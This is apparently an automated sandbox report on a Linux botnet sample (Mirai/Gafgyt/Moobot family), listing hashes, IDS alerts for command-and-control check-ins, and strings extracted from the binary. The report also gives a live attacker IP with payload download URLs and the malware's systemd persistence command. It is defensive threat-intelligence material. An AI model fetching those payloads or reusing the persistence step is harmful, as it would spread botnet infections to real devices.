Edit tour

Linux Analysis Report
na.elf

Overview

General Information

Sample name:	na.elf
Analysis ID:	1528132
MD5:	47b283fe2b62434075319b4e9ca076de
SHA1:	0b8a05062078824a5c64972d6281d350b5b7ad10
SHA256:	a364e8acff9c109c29a70ea35f6b27cb08ef74cd45fd8418c6e459edbe258b1c
Tags:	elfuser-abuse_ch
Infos:

Detection

Mirai, Gafgyt, Moobot, Okiru

Score:	92
Range:	0 - 100
Whitelisted:	false

Signatures

Detected Mirai

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Gafgyt

Yara detected Moobot

Yara detected Okiru

Connects to many ports of the same IP (likely port scanning)

Detected TCP or UDP traffic on non-standard ports

Executes commands using a shell command-line interpreter

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528132
Start date and time:	2024-10-07 16:25:55 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	na.elf
Detection:	MAL
Classification:	mal92.troj.linELF@0/3@34/0

Runtime Messages

Command:	/tmp/na.elf
PID:	5691
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	bolu_botnet_done.
Standard Error:

Process Tree

system is lnxubuntu20

na.elf (PID: 5691, Parent: 5617, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/na.elf

na.elf New Fork (PID: 5693, Parent: 5691)

na.elf New Fork (PID: 5695, Parent: 5691)

sh (PID: 5695, Parent: 5691, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable sbolo.service > /dev/null 2>&1"

sh New Fork (PID: 5701, Parent: 5695)

systemctl (PID: 5701, Parent: 5695, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable sbolo.service

na.elf New Fork (PID: 5705, Parent: 5691)

systemd New Fork (PID: 5703, Parent: 5702)

snapd-env-generator (PID: 5703, Parent: 5702, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Name	Description	Attribution	Blogpost URLs	Link
Bashlite, Gafgyt	Bashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.	No Attribution	http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/ https://blog.cyber5w.com/gafgyt-backdoor-analysis https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/ https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/ https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite

Name	Description	Attribution	Blogpost URLs	Link
MooBot		No Attribution	https://blog.netlab.360.com/ddos-botnet-moobot-en/ https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/ https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/ https://media.defense.gov/2024/Feb/27/2003400753/-1/-1/0/CSA-RUSSIAN-ACTORS-USE-ROUTERS-FACILITATE-CYBER_OPERATIONS.PDF https://otx.alienvault.com/pulse/6075b645942d5adf9bb8949b	https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot

Yara Signatures

Initial Sample

Source	Rule	Description	Author
na.elf	JoeSecurity_Gafgyt	Yara detected Gafgyt	Joe Security
na.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
na.elf	JoeSecurity_Moobot	Yara detected Moobot	Joe Security

Memory Dumps

Source	Rule	Description	Author
5691.1.00007fedd8017000.00007fedd8035000.r-x.sdmp	JoeSecurity_Gafgyt	Yara detected Gafgyt	Joe Security
5691.1.00007fedd8017000.00007fedd8035000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
5691.1.00007fedd8017000.00007fedd8035000.r-x.sdmp	JoeSecurity_Moobot	Yara detected Moobot	Joe Security
Process Memory Space: na.elf PID: 5691	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Process Memory Space: na.elf PID: 5691	JoeSecurity_Moobot	Yara detected Moobot	Joe Security

Suricata Signatures

ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T16:26:59.723365+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41616	91.200.103.117	23561	TCP
2024-10-07T16:27:04.345846+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41618	91.200.103.117	23561	TCP
2024-10-07T16:27:09.026283+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41620	91.200.103.117	23561	TCP
2024-10-07T16:27:20.647292+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41622	91.200.103.117	23561	TCP
2024-10-07T16:27:24.335242+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41624	91.200.103.117	23561	TCP
2024-10-07T16:27:33.965618+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41626	91.200.103.117	23561	TCP
2024-10-07T16:27:37.604755+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41628	91.200.103.117	23561	TCP
2024-10-07T16:27:46.506480+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41630	91.200.103.117	23561	TCP
2024-10-07T16:27:54.144610+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41632	91.200.103.117	23561	TCP
2024-10-07T16:27:56.766969+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41634	91.200.103.117	23561	TCP
2024-10-07T16:28:04.387884+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41636	91.200.103.117	23561	TCP
2024-10-07T16:28:07.029462+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41638	91.200.103.117	23561	TCP
2024-10-07T16:28:10.818956+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41640	91.200.103.117	23561	TCP
2024-10-07T16:28:13.488128+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41642	91.200.103.117	23561	TCP
2024-10-07T16:28:24.114230+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41644	91.200.103.117	23561	TCP
2024-10-07T16:28:34.803958+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41646	91.200.103.117	23561	TCP
2024-10-07T16:28:43.824060+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41648	91.200.103.117	23561	TCP
2024-10-07T16:28:51.844240+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41650	91.200.103.117	23561	TCP
2024-10-07T16:28:57.507766+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41652	91.200.103.117	23561	TCP
2024-10-07T16:29:00.124032+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41654	91.200.103.117	23561	TCP
2024-10-07T16:29:03.818952+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41656	91.200.103.117	23561	TCP
2024-10-07T16:29:09.456097+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41658	91.200.103.117	23561	TCP
2024-10-07T16:29:21.265138+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41660	91.200.103.117	23561	TCP
2024-10-07T16:29:28.886641+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41662	91.200.103.117	23561	TCP
2024-10-07T16:29:40.562967+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41664	91.200.103.117	23561	TCP
2024-10-07T16:29:45.542576+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41668	91.200.103.117	23561	TCP
2024-10-07T16:29:52.101309+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41670	91.200.103.117	23561	TCP
2024-10-07T16:29:56.715479+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41672	91.200.103.117	23561	TCP
2024-10-07T16:30:08.358601+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41674	91.200.103.117	23561	TCP
2024-10-07T16:30:12.001095+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41676	91.200.103.117	23561	TCP
2024-10-07T16:30:21.695401+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41678	91.200.103.117	23561	TCP
2024-10-07T16:30:28.314262+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41680	91.200.103.117	23561	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: na.elf

ReversingLabs: Detection: 55%

Source: na.elf

String: HTTP/1.1 200 OKbolubotnetarmbolubotnetarm5bolubotnetarm6bolubotnetarm7bolubotnetmipsbolubotnetmpslbolubotnetx86_64bolubotnetsh4abcdefghijklmnopqrstuvwxyz/proc/%d/exe/tmp/%s%s%c/proc/self/cmdline/proc/%d/proc/self/proc/proc/%d/cmdlinernetstatwgetcurlbusybox/bin/busybox/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/apache2srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spoolsshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/.x86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppcx86x86_64armarm5arm6arm7mipsmipselsh4ppcx86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppc.

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41620 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41630 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41660 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41632 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41618 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41642 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41646 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41634 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41638 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41652 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41674 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41654 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41616 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41640 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41678 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41622 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41628 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41650 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41664 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41656 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41676 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41644 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41662 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41680 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41670 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41658 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41636 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41672 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41624 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41626 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41668 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41648 -> 91.200.103.117:23561

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 91.200.103.117 ports 1,2,3,5,6,23561

Source: global traffic

TCP traffic: 192.168.2.15:41616 -> 91.200.103.117:23561

Source: global traffic	DNS traffic detected: DNS query: yi0key.heleh.com.vn
Source: global traffic	DNS traffic detected: DNS query: daisy.ubuntu.com

Source: na.elf	String found in binary or memory: http://91.200.103.117/%s
Source: na.elf, 5691.1.00007fedd8042000.00007fedd804d000.rw-.sdmp, sbolo.service.12.dr	String found in binary or memory: http://91.200.103.117/bolubotnetarm

Source: Initial sample	String containing 'busybox' found: busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: HTTP/1.1 200 OKbolubotnetarmbolubotnetarm5bolubotnetarm6bolubotnetarm7bolubotnetmipsbolubotnetmpslbolubotnetx86_64bolubotnetsh4abcdefghijklmnopqrstuvwxyz/proc/%d/exe/tmp/%s%s%c/proc/self/cmdline/proc/%d/proc/self/proc/proc/%d/cmdlinernetstatwgetcurlbusybox/bin/busybox/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/apache2srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spoolsshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/.x86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppcx86x86_64armarm5arm6arm7mipsmipselsh4ppcx86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppc.

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal92.troj.linELF@0/3@34/0

Source: /tmp/na.elf (PID: 5695)

Shell command executed: sh -c "systemctl enable sbolo.service > /dev/null 2>&1"

Jump to behavior

Source: /bin/sh (PID: 5701)

Systemctl executable: /usr/bin/systemctl -> systemctl enable sbolo.service

Jump to behavior

Source: /tmp/na.elf (PID: 5691)

Queries kernel information via 'uname':

Jump to behavior

Source: na.elf, 5691.1.00005612a8ed3000.00005612a9001000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: na.elf, 5691.1.00007ffd161d3000.00007ffd161f4000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm
Source: na.elf, 5691.1.00005612a8ed3000.00005612a9001000.rw-.sdmp	Binary or memory string: V!/etc/qemu-binfmt/arm
Source: na.elf, 5691.1.00007ffd161d3000.00007ffd161f4000.rw-.sdmp	Binary or memory string: Mx86_64/usr/bin/qemu-arm/tmp/na.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/na.elf

Stealing of Sensitive Information

Yara detected Gafgyt

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 5691.1.00007fedd8017000.00007fedd8035000.r-x.sdmp, type: MEMORY

Yara detected Moobot

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 5691.1.00007fedd8017000.00007fedd8035000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: na.elf PID: 5691, type: MEMORYSTR

Yara detected Okiru

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 5691.1.00007fedd8017000.00007fedd8035000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: na.elf PID: 5691, type: MEMORYSTR

Remote Access Functionality

Detected Mirai

Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)

Yara detected Gafgyt

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 5691.1.00007fedd8017000.00007fedd8035000.r-x.sdmp, type: MEMORY

Yara detected Moobot

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 5691.1.00007fedd8017000.00007fedd8035000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: na.elf PID: 5691, type: MEMORYSTR

Yara detected Okiru

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 5691.1.00007fedd8017000.00007fedd8035000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: na.elf PID: 5691, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Systemd Service	1 Systemd Service	Direct Volume Access	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Non-Standard Port	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Scripting	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
na.elf	55%	ReversingLabs	Linux.Backdoor.Mirai

Name	IP	Active	Malicious	Antivirus Detection	Reputation
daisy.ubuntu.com	162.213.35.25	true	false		unknown
yi0key.heleh.com.vn	91.200.103.117	true	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://91.200.103.117/%s	na.elf	false		unknown
http://91.200.103.117/bolubotnetarm	na.elf, 5691.1.00007fedd8042000.00007fedd804d000.rw-.sdmp, sbolo.service.12.dr	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.200.103.117	yi0key.heleh.com.vn	Germany		30823	COMBAHTONcombahtonGmbHDE	true

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
91.200.103.117	na.elf	Get hash	malicious	Mirai, Moobot, Okiru	Browse
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
daisy.ubuntu.com	na.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	162.213.35.25
	na.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	na.elf	Get hash	malicious	Gafgyt	Browse	162.213.35.25
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	162.213.35.24
	na.elf	Get hash	malicious	Gafgyt	Browse	162.213.35.25
